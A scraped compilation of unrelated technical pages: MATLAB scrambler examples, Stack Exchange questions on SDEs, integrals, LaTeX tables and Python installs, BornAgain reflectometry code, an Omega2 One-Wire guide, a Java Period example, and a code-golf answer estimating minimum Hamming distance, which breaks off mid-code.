Scramble and descramble 8-ary data using `comm.Scrambler` and `comm.Descrambler` System objects™ having a calculation base of 8. Create scrambler and descrambler objects while specifying the generator polynomial and initial conditions using name-value pairs. Note that the scrambler and descrambler polynomials are specified with different but equivalent syntaxes.

```matlab
N = 8;
scrambler = comm.Scrambler(N,'1 + z^-2 + z^-3 + z^-5 + z^-7', ...
    [0 3 2 2 5 1 7]);
descrambler = comm.Descrambler(N,[1 0 1 1 0 1 0 1], ...
    [0 3 2 2 5 1 7]);
```

Scramble and descramble random integers. Display the original data, scrambled data, and descrambled data sequences.

```matlab
data = randi([0 N-1],5,1);
scrData = scrambler(data);
deScrData = descrambler(scrData);
[data scrData deScrData]
```

```
ans =
     6     7     6
     7     5     7
     1     7     1
     7     0     7
     5     3     5
```

Verify the descrambled data matches the original data.

```matlab
isequal(data,deScrData)
```

```
ans =
  logical
   1
```

Scramble and descramble quaternary data while changing the initial conditions between function calls. Create scrambler and descrambler System objects™. Set the `InitialConditionsSource` property to `Input port` to be able to set the initial conditions as an argument to the object.

```matlab
N = 4;
scrambler = comm.Scrambler(N,'1 + z^-3','InitialConditionsSource','Input port');
descrambler = comm.Descrambler(N,'1 + z^-3','InitialConditionsSource','Input port');
```

Allocate memory for `errVec`.

```matlab
errVec = zeros(10,1);
```

Scramble and descramble random integers while changing the initial conditions, `initCond`, each time the loop executes.
Use the `symerr` function to determine if the scrambling and descrambling operations result in symbol errors.

```matlab
for k = 1:10
    initCond = randperm(3)';
    data = randi([0 N-1],5,1);
    scrData = scrambler(data,initCond);
    deScrData = descrambler(scrData,initCond);
    errVec(k) = symerr(data,deScrData);
end
```

Examine `errVec` to verify that the output from the descrambler matches the original data.

```matlab
errVec
```

```
errVec =
     0
     0
     0
     0
     0
     0
     0
     0
     0
     0
```

## Algorithms

This object implements the algorithm, inputs, and outputs described on the Scrambler block reference page. The object properties correspond to the block parameters.
https://math.stackexchange.com/questions/4041197/sde-with-constant-coefficients
# SDE with constant coefficients

So the simplest possible SDE would be
$$\begin{cases} dX_t = a\,dt + b\,dW_t, & a,b\in \mathbb{R} \\ X_0 = x_0 \end{cases}$$
describing a 1-dimensional stochastic process $X_t$ on a probability space $(\Omega, \mathcal{F}, P)$ with $t \in [0,\infty)$. I know that in this case the distribution of the solution is Gaussian, so it is enough to characterize $\mathbb{E}[X_t]$ and $\mathrm{Var}(X_t)$. Taking the expectation and variance of the equation, I get that $X_t \sim \mathcal{N}(x_0 + at,\, b^2t)$.

The problem I am interested in is a piecewise constant SDE, where
$$a = \begin{cases} a_1, & \text{if } X_t > 0\\ a_2, & \text{if } X_t \leq 0 \end{cases} \qquad b = \begin{cases} b_1, & \text{if } X_t > 0\\ b_2, & \text{if } X_t \leq 0. \end{cases}$$
How would one "piece together" the two solutions on either side of $0$? It would be simple to solve the equation on either side, but I think there would have to be some compatibility condition at 0. One problem I know of is that a Brownian motion will hit $0$ infinitely many times in a time interval $[0,\epsilon)$, which means that each time $X_t = 0$, there is a small interval where the process may not be well-defined. I was thinking to fix this by stopping the process every time it hits $0$, and restarting it after it "escapes" some neighborhood of 0. Perhaps this could be reframed as a reflected diffusion.

Note: there are two relevant solution methods for similar problems that I've seen in the literature, one involving an analytic solution to the constant-coefficients problem (Karatzas and Shreve), and a numerical solution to the reflecting boundary problem (Skorokhod); I'm not sure which is appropriate here.

- To answer your parenthetical question: Rather $X_t-X_0$ has the written distribution, so that given $X_0=x_0$, $X_t\sim \mathcal{N}(x_0+at, b^2 t)$. – Nap D. Lover Feb 26 at 19:40
- Ah yes, edited!
– 900edges Feb 26 at 19:46

You could replace the constant coefficients $a$ and $b$ with coefficient functions in terms of indicator functions:
$$a(x)=a_1 \cdot \mathbb{1}_{(0, \infty)}(x)+a_2 \cdot \mathbb{1}_{(-\infty, 0]}(x)$$
and a similar expression for $b$ but with the constants $b_1, b_2$. Then the SDE is
$$dX_t=a(X_t)\,dt+b(X_t)\,dB_t.$$
Here is a simulation of a sample path via the Euler-Maruyama scheme implemented in R with initial point $x_0=0$, total time $T=1$, and parameters $a_1=-0.05$, $a_2=0.1$, $b_1=0.1$ and $b_2=0.3$ with $n=1000$ time subintervals; and here is one more simulation that crosses the line $x=0$ with all the same parameters except starting below zero at $x_0=-1$ and running the path for $T=10$. If I can derive any analytic information, I will update this post.

- @900edges Indeed, unfortunately, at least at the moment, I cannot find much to say analytically. I added another sample path that starts below zero and eventually crosses $x=0$, just for reference. – Nap D. Lover Feb 26 at 20:28
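The Euler-Maruyama recipe described in the answer is easy to reproduce. The R code itself is not shown in this extract, so here is a minimal pure-Python sketch using the same illustrative parameter values; the drift and diffusion are switched on the sign of the current state at each step:

```python
import math
import random

def euler_maruyama(x0, T, n, a1=-0.05, a2=0.1, b1=0.1, b2=0.3, seed=1):
    """Simulate dX = a(X) dt + b(X) dW with piecewise-constant
    coefficients: (a1, b1) where X > 0 and (a2, b2) where X <= 0."""
    rng = random.Random(seed)
    dt = T / n
    sqdt = math.sqrt(dt)
    x = x0
    path = [x]
    for _ in range(n):
        a, b = (a1, b1) if x > 0 else (a2, b2)
        x += a * dt + b * sqdt * rng.gauss(0.0, 1.0)
        path.append(x)
    return path

path = euler_maruyama(0.0, 1.0, 1000)   # x0 = 0, T = 1, n = 1000
```

Note this only produces approximate sample paths; it sidesteps the well-posedness question at $X_t = 0$ that the original post raises, since the discretized process spends zero time exactly at the interface almost surely.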
https://gis.stackexchange.com/questions/193778/change-which-default-python-install-runs-py-scripts-a-the-command-prompt
# Change which default python install runs .py scripts at the command prompt

I have 3 installations of python on my machine currently: the ArcGIS install, the QGIS install, and an Anaconda install. The Anaconda one is the one that I use predominantly. If I run a .py script (checkSource.py) with the following lines at the command prompt, I get different results depending on how I call it:

```
import sys
sys.prefix
```

```
C:\Users\RDebbout> checkSource.py
'C:\Python27\ArcGISx6410.3'
C:\Users\RDebbout> python checkSource.py
'C:\Users\RDebbout\AppData\Local\Continuum\Anaconda'
```

Will running .py scripts at the command line always search for the C:\Python27 install first? Is there a way to change this? I never do anything with the ArcGIS install other than import arcpy into the Anaconda install through the .pth file, and would like to keep it sidelined from being used at the command prompt; so if I run a .py file there, I want it to default to the Anaconda install, not the Arc install.

- C:\Python27\ArcGISx6410.3\python.exe C:\Users\RDebbout\checkSource.py etc. – Midavalo May 16 '16 at 18:33
- this is a solution to explicitly call which python to use when running a script, however I am looking for a way to set up my environment variables so that it doesn't find the ArcGIS python when running the .py file. – rickD May 16 '16 at 18:56

One posted answer:

```
start C:\Python27\ArcGIS10.3\python.exe C:\Path\to_the\script\to_run.py
```
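For what it's worth, on Windows the interpreter that launches a bare `checkSource.py` invocation is chosen by the `.py` file-type association, not by `PATH`. A sketch of inspecting and repointing that association (run from an elevated command prompt; the Anaconda path is the one quoted in the question, and the `Python.File` type name is what a stock CPython install typically registers — verify yours with the first two commands):

```bat
:: show how .py is currently associated
assoc .py
:: e.g. ".py=Python.File" -- then show what that file type launches
ftype Python.File
:: repoint the association at the Anaconda interpreter
ftype Python.File="C:\Users\RDebbout\AppData\Local\Continuum\Anaconda\python.exe" "%1" %*
```

After this, typing `checkSource.py` alone should report the Anaconda prefix, while explicit invocations like `C:\Python27\ArcGISx6410.3\python.exe checkSource.py` still work unchanged.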
https://www.hackmath.net/en/math-problem/2236
# Flood water

Flood waters in some US village meant that the homes had to evacuate 252 people. 50 of them stayed at elementary schools, 61 of them slept at friends' houses, and the rest went to relatives. How many people went to relatives?

x = 141

### Step-by-step explanation:

$x=252-50-61=141$
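The subtraction can be sanity-checked with a couple of lines of Python:

```python
evacuated = 252
at_schools = 50
with_friends = 61
to_relatives = evacuated - at_schools - with_friends
print(to_relatives)  # -> 141
```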
https://math.stackexchange.com/questions/3827906/how-is-this-special-case-of-this-integral-solved
# How is this special case of this integral solved?

I have the following spherical density distribution:
$$\rho(x, z) = \frac{1}{\sqrt{x^2 + z^2}\left(1+\sqrt{x^2+z^2}\right)^2}$$
which I have broken into a "line of sight" dimension $z$ and a "transverse" dimension $x$. Integrating this profile along the line of sight gives the projected 2d density $\Sigma$:
$$\Sigma(x) = 2\int_0^\infty\rho(x,z)\,dz$$
I wish to compute this for any generic upper bound $\zeta$, i.e.
$$\Sigma(x; \zeta) = 2\int_0^\zeta\rho(x,z)\,dz$$
(that is, $\zeta=\infty$ corresponds to the case of projecting the entire distribution onto the transverse plane, while $\zeta<\infty$ corresponds to a projection which is truncated in the $z$-dimension).

It turns out this has to be solved piecewise; the solution for $x>1$, via Mathematica 11.3, is
$$\left.\int_0^\zeta\rho(x, z)\,dz\right\rvert_{x>1} = \frac{\zeta \left(\sqrt{x^2+\zeta^2}-1\right)}{\left(x^2-1\right) \left(x^2+\zeta^2-1\right)}+\frac{\tan ^{-1}\left(\frac{\zeta}{\sqrt{\left(x^2-1\right) \left(x^2+\zeta^2\right)}}\right)-\tan ^{-1}\left(\frac{\zeta}{\sqrt{x^2-1}}\right)}{\left(x^2-1\right)^{3/2}}$$
However, I am unable to obtain the solution for the case $x<1$. I currently only have access to Mathematica 12.0, rather than 11.3 which reproduces the form above, and it is failing on this integral. Performing

```mathematica
Assuming[{x < 1, ζ \[Element] Reals, ζ > 0},
 FullSimplify[
  Integrate[1/(Sqrt[x^2 + z^2] (1 + Sqrt[x^2 + z^2])^2), {z, 0, ζ}]]]
```

returns a Hypergeometric function, though I suspect that the $x<1$ case should not be much more complicated than $x>1$. Can anyone confirm? Or see any issue?

- Please make titles informative as to the content of the post, not as to the mental state of the person posting them at the time they are posting them.
– Sep 16 '20 at 1:09
- A question about Mathematica may be better suited for mathematica.stackexchange.com – Sep 16 '20 at 1:48
- @ArturoMagidin apologies; fixed – Sep 16 '20 at 5:02

WolframAlpha is giving me, on the substitution $z = x\tan\theta$:
$$\int\rho(x, z)\,dz = \frac{x\sin\theta}{\left(x^2-1\right) \left(\cos\theta+x\right)} - \frac{2\tanh^{-1}\left(\frac{x-1}{\sqrt{1-x^2}}\tan\frac{\theta}{2}\right)}{(1- x^2)^{3/2}} + C$$
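As a sanity check on the quoted $x>1$ closed form, here is a short self-contained Python sketch comparing it against direct numerical quadrature of $\rho$ (a plain composite Simpson rule, so no external libraries are needed; one can verify by differentiating in $\zeta$ that the closed form's derivative reduces back to $\rho$):

```python
import math

def rho(x, z):
    # spherical density profile from the question
    s = math.sqrt(x * x + z * z)
    return 1.0 / (s * (1.0 + s) ** 2)

def closed_form(x, zeta):
    # Mathematica's result for the x > 1 branch, as quoted above
    a = math.sqrt(x * x - 1.0)       # sqrt(x^2 - 1)
    s2 = x * x + zeta * zeta         # x^2 + zeta^2
    term1 = zeta * (math.sqrt(s2) - 1.0) / ((x * x - 1.0) * (s2 - 1.0))
    term2 = (math.atan(zeta / (a * math.sqrt(s2)))
             - math.atan(zeta / a)) / a ** 3
    return term1 + term2

def simpson(f, lo, hi, n=4000):
    # composite Simpson rule; n must be even
    h = (hi - lo) / n
    acc = f(lo) + f(hi)
    for i in range(1, n):
        acc += f(lo + i * h) * (4 if i % 2 else 2)
    return acc * h / 3.0

x, zeta = 2.0, 3.0
numeric = simpson(lambda z: rho(x, z), 0.0, zeta)
print(abs(numeric - closed_form(x, zeta)))  # small quadrature residual
```

The two agree to within quadrature error for $x>1$, which supports the quoted Mathematica 11.3 expression; only the analytic continuation to $x<1$ remains in question.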
https://tex.stackexchange.com/tags/tables/hot
# Tag Info

## Hot answers tagged tables

### LaTeX table not working

One possible solution:
• wider \textwidth determined by use of the geometry package
• \footnotesize font size
• different widths of columns
• use of the tabularray package

\documentclass{article}
\usepackage{...

### makecell: how to reduce the line spacing in multiline cells?

With use of the tabularray package it is simple:

\documentclass[12pt]{article}
\usepackage{tabularray}
\begin{document}
\begin{tblr}{cells=l, rowsep=3pt}
foobar &...

### Make all lines of tables thicker

Second edit: if you prefer to use the classic tabular, \setlength{\arrayrulewidth}{5pt} before the array seems to do the trick too. Edit: following your comment below, here's a version that should be ...

### tabular: thicker lines

Here is what you can do with {NiceTabular} of nicematrix.

\documentclass{article}
\usepackage{nicematrix,tikz}
\begin{document}
\NiceMatrixOptions
{ custom-line = { letter = B, ...

### How to highlight the first column of Table?

I used the packages xcolor and colortbl to define a color Higlight and a new column type h. This produces: Here is the code:

\documentclass[12pt]{report}
\usepackage{xcolor,colortbl}
\definecolor{...

### Colorcells and Rowcolor in spreadtab

It is quite easy to customize styles of tables while using spreadtab if you would like to use the tblr environment of the tabularray package:

\documentclass[a4paper,14pt]{extreport}
\usepackage{spreadtab}
\...

### Figure with two graphics and one matrix

You can exploit the fact that a tabular is vertically centered with respect to the baseline (actually, not exactly, but it's not so important).

\documentclass{article}
\usepackage{amsmath}
\usepackage{...

### Tabular environment malfunctioning: incorrect order and whitespace

With use of the tabularray and adjustbox packages, \small font size, and without resizing of the table:

\documentclass{article}
\usepackage[margin=25mm]{geometry}
\usepackage{tabularray}
\usepackage[export]{...

### Error in making table with multiple columns

I suggest you employ a matrix environment (provided by the amsmath package) in an unnumbered displayed equation instead of a tabular environment embedded in a center environment.

\documentclass{...

### Figure with two graphics and one matrix

With the tabularray and adjustbox packages:

\documentclass{article}
\usepackage{amsmath}
\usepackage[export]{adjustbox}
\usepackage{tabularray}
\begin{document}
\begin{figure}
\centering
\begin{tblr}{...

### Text width inside a table

I suggest the macro \twoboards with six parameters: title, board, moves of the left image and title, board, moves of the right image. We need not any tabular environment. Each \twoboards is a \centerline with two ...

### Text width inside a table

You didn't properly set your tabular and margins. I define a new column type P which has fixed width and center alignment. I set the margin to 2cm (top, bottom, left and right) and showed the page frame ...

### Generate tabularray and compute sub-result for each row using functional library

To avoid potential naming conflicts with commands in the LaTeX kernel and other packages, the functional package has changed its naming scheme for functions from \UpperCamelCase to \lowerCamelCase since ...

### How to position bullet on top of tabular?

Use \begin{tabular*}{...}[t] to top-align a tabular.

### Latex3 floating point calculations in longtblr (tabularray)

Although I think it would be better to use the functional library to do programming inside tabularray tables, you could still use expl3 if you want. You may compare this answer with another answer for a ...
https://www.bornagainproject.org/documentation/tutorial-examples/reflectometry/beam-angular-divergence/
Beam Angular Spread in Specular Simulations

This example demonstrates beam angular spread effects in reflectivity computations. It also offers a comparison with data generated using another well-known code: GenX. Further information about reflectometry simulations can be found in the Reflectometry Simulation Tutorial.

The observed reflectometry signal can be affected either by a spread in the beam wavelength or in the incident angle. In this example, a Gaussian distribution is used to spread the incident angle, with a standard deviation of $\sigma_{\alpha} = 0.01^{\circ}$.

```python
"""
An example of taking into account beam angular divergence
and beam footprint correction in reflectometry calculations
with BornAgain.
"""
import numpy as np
import bornagain as ba
from os import path

# input parameters
wavelength = 1.54 * ba.angstrom
alpha_i_min = 0.0 * ba.deg  # min incident angle, deg
alpha_i_max = 2.0 * ba.deg  # max incident angle, deg
beam_sample_ratio = 0.01  # beam-to-sample size ratio

# convolution parameters
d_ang = 0.01 * ba.deg  # spread width for incident angle
n_sig = 3  # number of sigmas to convolve over
n_points = 25  # number of points to convolve over

# substrate (Si)
si_sld_real = 2.0704e-06  # \AA^{-2}

# layer parameters
n_repetitions = 10
# Ni
ni_sld_real = 9.4245e-06  # \AA^{-2}
d_ni = 70 * ba.angstrom
# Ti
ti_sld_real = -1.9493e-06  # \AA^{-2}
d_ti = 30 * ba.angstrom


def get_sample():
    # defining materials
    m_air = ba.MaterialBySLD("Air", 0.0, 0.0)
    m_ni = ba.MaterialBySLD("Ni", ni_sld_real, 0.0)
    m_ti = ba.MaterialBySLD("Ti", ti_sld_real, 0.0)
    m_substrate = ba.MaterialBySLD("SiSubstrate", si_sld_real, 0.0)

    air_layer = ba.Layer(m_air)
    ni_layer = ba.Layer(m_ni, d_ni)
    ti_layer = ba.Layer(m_ti, d_ti)
    substrate_layer = ba.Layer(m_substrate)

    multi_layer = ba.MultiLayer()
    multi_layer.addLayer(air_layer)
    for i in range(n_repetitions):
        multi_layer.addLayer(ti_layer)
        multi_layer.addLayer(ni_layer)
    multi_layer.addLayer(substrate_layer)
    return multi_layer


def create_real_data():
    """
    Loading data from genx_angular_divergence.dat
    """
    filepath = path.join(path.dirname(path.realpath(__file__)),
                         "genx_angular_divergence.dat.gz")
    ax_values, real_data = np.loadtxt(filepath, usecols=(0, 1),
                                      skiprows=3, unpack=True)

    # translating axis values from double incident angle
    # to incident angle
    ax_values *= 0.5

    return ax_values, real_data


def get_simulation(scan_size=500):
    """
    Returns a specular simulation with beam and detector defined.
    """
    footprint = ba.FootprintFactorSquare(beam_sample_ratio)
    alpha_distr = ba.RangedDistributionGaussian(n_points, n_sig)
    scan = ba.AngularSpecScan(wavelength, scan_size, alpha_i_min, alpha_i_max)
    scan.setFootprintFactor(footprint)
    scan.setAbsoluteAngularResolution(alpha_distr, d_ang)

    simulation = ba.SpecularSimulation()
    simulation.setScan(scan)
    return simulation


def run_simulation():
    """
    Runs simulation and returns it.
    """
    sample = get_sample()
    simulation = get_simulation()
    simulation.setSample(sample)
    simulation.runSimulation()
    return simulation.result()


def plot(results):
    """
    :param results:
    :return:
    """
    from matplotlib import pyplot as plt
    ba.plot_simulation_result(results, postpone_show=True)

    genx_axis, genx_values = create_real_data()
    plt.semilogy(genx_axis, genx_values, 'ko', markevery=300)
    plt.legend(['BornAgain', 'GenX'], loc='upper right')
    plt.show()


if __name__ == '__main__':
    results = run_simulation()
    plot(results)
```

BeamAngularDivergence.py
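Conceptually, the angular smearing applied by `setAbsoluteAngularResolution` amounts to convolving the ideal curve with a Gaussian resolution function in the incident angle. A standalone numpy sketch of that idea (my own toy reflectivity curve, not BornAgain's internals):

```python
import numpy as np

# Toy sketch of Gaussian angular smearing: convolve an ideal curve
# sampled on a uniform angle grid with a normalized Gaussian kernel.
alpha = np.linspace(0.0, 2.0, 501)           # incident angle grid, deg
step = alpha[1] - alpha[0]
r_ideal = 1.0 / (1.0 + (alpha / 0.3) ** 4)   # made-up reflectivity curve

sigma = 0.01                                  # angular std dev, deg
half = int(np.ceil(3 * sigma / step))         # kernel covers +/- 3 sigma
x = np.arange(-half, half + 1) * step
kernel = np.exp(-0.5 * (x / sigma) ** 2)
kernel /= kernel.sum()                        # unit total weight

r_smeared = np.convolve(r_ideal, kernel, mode="same")
```

Because the kernel is normalized, the smeared curve matches the ideal one away from sharp features and grid edges; only regions varying on the scale of `sigma` are visibly broadened.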
https://docs.onion.io/omega2-docs/communicating-with-1w-devices.html
## Communicating with One-Wire Devices

The One-Wire protocol is a bus-based protocol that, as the name implies, uses just one data wire to transmit data between devices. It allows controllers and processors like the Omega2 to easily communicate with peripheral devices like:

• Sensors, such as temperature, humidity
• Programmable Input/Output chips
• Small relays

### The One-Wire Protocol

One-Wire is similar to the I2C protocol (which is coincidentally sometimes called TWI - Two Wire Interface). One-Wire has a lower data transmission rate than I2C but it makes up for it with a longer range. It follows a master-slave architecture, with each bus allowing for one master, in this case the Omega, and many slave devices.

Every device type has its own unique single-byte (8-bit) identifier, e.g. 0x8f. Each device in turn has its own unique 8-byte (64-bit) serial number that includes a byte to describe the device type, known as the family code, as the Least Significant Byte (LSB). An example of a One-Wire device serial number is shown below: (diagram not shown)

One-Wire is also referred to as 1W, 1-Wire, W1, etc.

### The Omega & One-Wire

Interacting with One-Wire devices with the Omega is slightly different from I2C, SPI, and Serial devices, but you'll see that it's not a big deal. Since there is no dedicated hardware One-Wire controller on the Omega, your One-Wire device can be connected to any GPIO. We will then register a One-Wire master in Linux associated with the selected GPIO that will allow us to communicate with the One-Wire slave devices.

Note that you need to be on firmware b151 or higher!

### Connecting the Hardware

One-Wire devices will have three available connectors:

• Vcc (usually 3.3V)
• GND
• Data Line

Take a look at your specific sensor's datasheet to identify the pins and determine the recommended voltage.
Make the following connections to your Omega:

| Pin  | Omega Connection |
|------|------------------|
| Vcc  | 3.3V             |
| GND  | GND              |
| Data | GPIO19           |

Note that making these connections is very easy if you have an Expansion, Power, or Arduino Dock since they all expose the Omega's GPIOs. Most GPIOs will work, but for now, let's use GPIO19.

Some One-Wire devices will require a pull-up resistor on the Data line. For example, the popular DS18B20 temperature sensor requires a 4.7 kΩ pull-up resistor on the Data line to operate properly. Some One-Wire devices have built-in pull-up resistors or can require different resistance values; check the datasheet of your device to be sure!

A pull-up resistor is a connection between, in this case, the data line and the voltage line. When the Data line is inactive, the pull-up resistor will "pull" the signal to a logical high. Then when the Data line goes active, it will override the pull-up. It essentially ensures the logical level is always valid.

### Registering the One-Wire Master

We will need to let our Linux operating system know that we intend to act as a One-Wire master on GPIO19. So let's run the following command:

insmod w1-gpio-custom bus0=0,19,0

This command does the following:

• Tells Linux to load the w1-gpio-custom kernel module that will allow the Omega to act as a One-Wire master
• It defines that this will be bus0
• The 0,19,0 means:
  • This is for bus number 0
  • Use GPIO19 as the data pin to communicate with the One-Wire devices
  • The final 0 indicates that we will not be setting the data pin to open drain mode

If this command is successful, the following folder will become available:

/sys/devices/w1_bus_master1

Take a look inside this directory, it will be our One-Wire command centre!
#### Removing a One-Wire Master

If you're done using your One-Wire device and would like to have your GPIO back, you can disable the One-Wire master by running the following command:

rmmod w1-gpio-custom

### Finding One-Wire Slave Devices

Now let's use the new /sys/devices/w1_bus_master1 directory to find our slave devices. First let's check to see if there are any slave devices at all:

cat /sys/devices/w1_bus_master1/w1_master_slave_count

The output will be a number that will tell us how many slave devices are connected:

• If it is a 1, you already have your device plugged in and you're good to go.
• If you see a 0, go ahead and plug in your device.
• The One-Wire bus master kernel module scans the data pin every 10 seconds for new devices, so wait a little while and try again.

If your check of the slave count file reads 1, your device has been detected. Run ls /sys/devices/w1_bus_master1 and you should see a directory that looks something like this: 28-000123456789. That's the directory of your slave device and it is based on the slave's unique serial number. Note that each device will have a different serial number, so yours might look a little different. This makes it a little difficult to use One-Wire devices programmatically, but don't worry, there's a solution! Running:

cat /sys/devices/w1_bus_master1/w1_master_slaves

will print a (newline-delimited) list of the serial numbers of all connected One-Wire slaves!

### Reading from a One-Wire Device

Reading from an attached One-Wire device is very simple, just run the following:

cat /sys/devices/w1_bus_master1/<DeviceID>/w1_slave

where <DeviceID> is the serial number of your One-Wire device. Using the DS18B20 temperature sensor from the section above, the command would be:

cat /sys/devices/w1_bus_master1/28-000123456789/w1_slave

And it will print something like:

b1 01 4b 46 7f ff 0c 10 d8 : crc=d8 YES
b1 01 4b 46 7f ff 0c 10 d8 t=27062

where the final t=27062 indicates the temperature is 27.062 ˚C.
To trim and format the output so just the temperature is returned:

root@Omega-2970:/# awk -F= '/t=/ {printf "%.03f\n", $2/1000}' /sys/devices/w1_bus_master1/28-000123456789/w1_slave
27.062
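The same parsing can be done from a script. A small Python sketch (my own, not from this guide; the device ID and sample output are the examples quoted above):

```python
# Sketch: parse the One-Wire sysfs strings described in this guide.
def parse_w1_id(name):
    """Split a sysfs device name like '28-000123456789' into the
    family code (0x28 is the DS18B20 family) and the serial number."""
    family, serial = name.split("-")
    return int(family, 16), int(serial, 16)

def read_w1_temp(raw):
    """Parse two-line w1_slave output and return degrees Celsius,
    or None if the CRC check failed (first line not ending in YES)."""
    lines = raw.strip().splitlines()
    if not lines[0].endswith("YES"):
        return None
    return int(lines[1].rsplit("t=", 1)[1]) / 1000.0

sample = ("b1 01 4b 46 7f ff 0c 10 d8 : crc=d8 YES\n"
          "b1 01 4b 46 7f ff 0c 10 d8 t=27062")
assert parse_w1_id("28-000123456789") == (0x28, 0x123456789)
assert read_w1_temp(sample) == 27.062

# On the Omega itself you would read the real file, e.g.:
# with open("/sys/devices/w1_bus_master1/28-000123456789/w1_slave") as f:
#     print(read_w1_temp(f.read()))
```

Checking for the `YES` marker before trusting `t=` mirrors what the kernel driver reports: a failed CRC means the reading should be retried, not parsed.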
https://www.tutorialspoint.com/period-plusmonths-method-in-java
# Period plusMonths() method in Java

An immutable copy of a Period object with some months added to it can be obtained using the plusMonths() method in the Period class in Java. This method requires a single parameter, i.e. the number of months to be added, and it returns the Period object with the added months.

A program that demonstrates this is given as follows:

## Example

```java
import java.time.Period;

public class Demo {
    public static void main(String[] args) {
        String period = "P5Y7M15D";
        Period p1 = Period.parse(period);
        System.out.println("The Period is: " + p1);
        Period p2 = p1.plusMonths(2);
        System.out.println("The Period after adding 2 months is: " + p2);
    }
}
```

## Output

The Period is: P5Y7M15D
The Period after adding 2 months is: P5Y9M15D

Now let us understand the above program. First the current Period is displayed. Then an immutable copy of the Period with 2 months added is obtained using the plusMonths() method, and this is displayed. A code snippet that demonstrates this is as follows:

```java
String period = "P5Y7M15D";
Period p1 = Period.parse(period);
System.out.println("The Period is: " + p1);
Period p2 = p1.plusMonths(2);
System.out.println("The Period after adding 2 months is: " + p2);
```

Updated on 30-Jul-2019 22:30:25
https://codegolf.stackexchange.com/questions/199145/estimate-the-mean-minimum-hamming-distance
# Estimate the mean minimum Hamming distance

Inputs $$b \leq 100$$ and $$n \geq 2$$. Consider $$n$$ binary strings, each of length $$b$$, sampled uniformly and independently. We would like to compute the expected minimum Hamming distance between any pair. If $$n = 2$$ the answer is always $$b/2$$.

Correctness

Your code should ideally be within $$\pm 0.5$$ of the correct mean. However, as I don't know what the correct mean is, for values of $$n$$ which are not too large I have computed an estimate, and your code should be within $$\pm 0.5$$ of my estimate (I believe my estimate is within $$\pm 0.1$$ of the correct mean). For larger values than my independent tests will allow, your answer should explain why it is correct.

• $$b = 99, n = 2^{16}$$. Estimated avg. $$19.61$$.
• $$b = 89, n = 2^{16}$$. Estimated avg. $$16.3$$.
• $$b = 79, n = 2^{16}$$. Estimated avg. $$13.09$$.
• $$b = 69, n = 2^{16}$$. Estimated avg. $$10.03$$.
• $$b = 59, n = 2^{16}$$. Estimated avg. $$7.03$$.
• $$b = 99, n = 2^{15}$$. Estimated avg. $$20.67$$.
• $$b = 89, n = 2^{15}$$. Estimated avg. $$17.26$$.
• $$b = 79, n = 2^{15}$$. Estimated avg. $$13.99$$.
• $$b = 69, n = 2^{15}$$. Estimated avg. $$10.73$$.
• $$b = 59, n = 2^{15}$$. Estimated avg. $$7.74$$.
• $$b = 99, n = 2^{14}$$. Estimated avg. $$21.65$$.
• $$b = 89, n = 2^{14}$$. Estimated avg. $$18.23$$.
• $$b = 79, n = 2^{14}$$. Estimated avg. $$14.83$$.
• $$b = 69, n = 2^{14}$$. Estimated avg. $$11.57$$.
• $$b = 59, n = 2^{14}$$. Estimated avg. $$8.46$$.

Score

Your base score will be the number of the examples above that your code gets right within $$\pm 0.5$$. On top of this you should add $$x > 16$$ for the largest $$n = 2^x$$ for which your code gives the right answer within $$\pm 0.5$$ for all of $$b = 59, 69, 79, 89, 99$$ (and also all smaller values of $$x$$).
That is, if your code can achieve this for $$n=2^{18}$$ then you should add $$18$$ to your score. You only get this extra score if you can also solve all the instances for all smaller $$n$$ as well. The number of strings $$n$$ will always be a power of two.

Time limits

For a single $$n, b$$ pair, your code should run on TIO without timing out.

Rougher approximation answers for larger values of $$n$$

For larger values of $$n$$ my independent estimates will not be as accurate but may serve as a helpful guide nonetheless. I will add them here as I can compute them.

• $$b = 99, n = 2^{17}$$. Rough estimate $$18.7$$.
• $$b = 99, n = 2^{18}$$. Rough estimate $$17.9$$.
• $$b = 99, n = 2^{19}$$. Rough estimate $$16.8$$.

• I thought this was posted on the Sandbox earlier today. – S.S. Anne Feb 8 '20 at 1:19
• @S.S.Anne Yes I posted it there first. I look forward to the first answers! – user9207 Feb 8 '20 at 6:38
• The time limit is probably unnecessary as it both limits users to TIO languages and needlessly disqualifies solutions that take a long time but do solve the problem. I understand wanting to prevent brute forcing, but I'd argue that should also be valid – ATaco Feb 8 '20 at 7:44
• @ATaco I understand that point of view but it completely changes the challenge. Brute force solutions are valid here of course. It's just a question of what score you get. The time limit/TIO is also crucial, as otherwise you will just get a higher score by having a more powerful computer or leaving it to run for longer. – user9207 Feb 8 '20 at 7:48
• Using TIO for timing is not a good idea. Had you left this in the sandbox longer, I'd have suggested you switch to requiring that submissions pass your examples within a certain time limit which you would verify (like fastest-code). What you currently have makes it extremely difficult to determine what the score of any submission should actually be. – FryAmTheEggman Feb 8 '20 at 19:03

# Python 3, score = big(?)
```python
from math import exp, log, log1p

def f(b, n):
    e = n * (n - 1) / 2
    m = 0
    c = 1
    s = 0
    t = 1 << b
    for k in range(b):
        s += c
        m += exp(e * (log1p(-s / t) if 2 * s < t else log((t - s) / t)))
        c = c * (b - k) // (k + 1)
    return m
```

Try it online!

The Hamming distance $$D_{x, y}$$ between any two of the strings ($$1 \le x < y \le n$$) is a random variable distributed as the Binomial distribution $$B\left(b, \tfrac12\right)$$:

$$\Pr[D_{x, y} > k] = 1 - \frac{1}{2^b} \sum_{i=0}^k \binom bi.$$

Furthermore, any (distinct) two of these $$\binom n2$$ random variables are independent. If we make the incorrect but empirically useful assumption that all $$\binom n2$$ of these random variables are independent, then we can compute the distribution of their minimum $$D = \min_{1 \le x < y \le n} D_{x,y}$$ exactly:

$$\begin{gather*} \Pr[D > k] = \left(1 - \frac{1}{2^b} \sum_{i=0}^k \binom bi\right)^{\binom n2}, \\ \mathbb E[D] = \sum_{k=0}^{b-1} \Pr[D > k]. \end{gather*}$$

This result can be computed extremely quickly and seems to be close enough. Numerical evidence suggests that the absolute error is worst at $$b = 1, n = 3$$ (where we estimate the expected minimum as $$\tfrac18$$ when it is actually $$0$$), and drops off quickly to zero as $$b$$ and/or $$n$$ get large.

• Awesome! And quickly done too. – user9207 Feb 8 '20 at 11:37
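The independence assumption is easy to sanity-check for small parameters by brute force. A Monte Carlo sketch of my own (not part of the answer; `monte_carlo` and its parameters are mine), alongside a re-statement of the answer's closed form:

```python
import random
from math import exp, log, log1p

def f(b, n):
    # closed form under the pairwise-independence approximation
    # (same function as in the answer above)
    e = n * (n - 1) / 2
    m, c, s, t = 0, 1, 0, 1 << b
    for k in range(b):
        s += c
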